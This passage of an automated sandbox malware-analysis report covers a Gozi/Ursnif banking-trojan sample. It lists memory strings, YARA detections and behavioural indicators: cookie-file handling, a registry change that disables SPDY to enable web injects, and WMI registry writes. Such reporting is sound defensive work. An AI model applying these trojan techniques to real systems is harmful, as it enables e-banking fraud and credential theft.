          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: RuntimeBroker.exe, 00000027.00000002.579872575.0000017766517000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Termsame
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermslonWdtP
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Termslse
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288621987.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288591896.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.295245687.0000000003EEB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288759525.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288745894.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288726678.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6736, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 4544, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4000, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5276, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY

          E-Banking Fraud:

          barindex
          Detected Gozi e-Banking trojanShow sources
          Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_03125ECA
          Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie0_2_03125ECA
          Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_03125ECA
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288621987.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288591896.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.295245687.0000000003EEB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288759525.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288745894.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.288726678.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6736, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 4544, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4000, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5276, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
          Disables SPDY (HTTP compression, likely to perform web injects)Show sources
          Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Writes or reads registry keys via WMIShow sources
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMI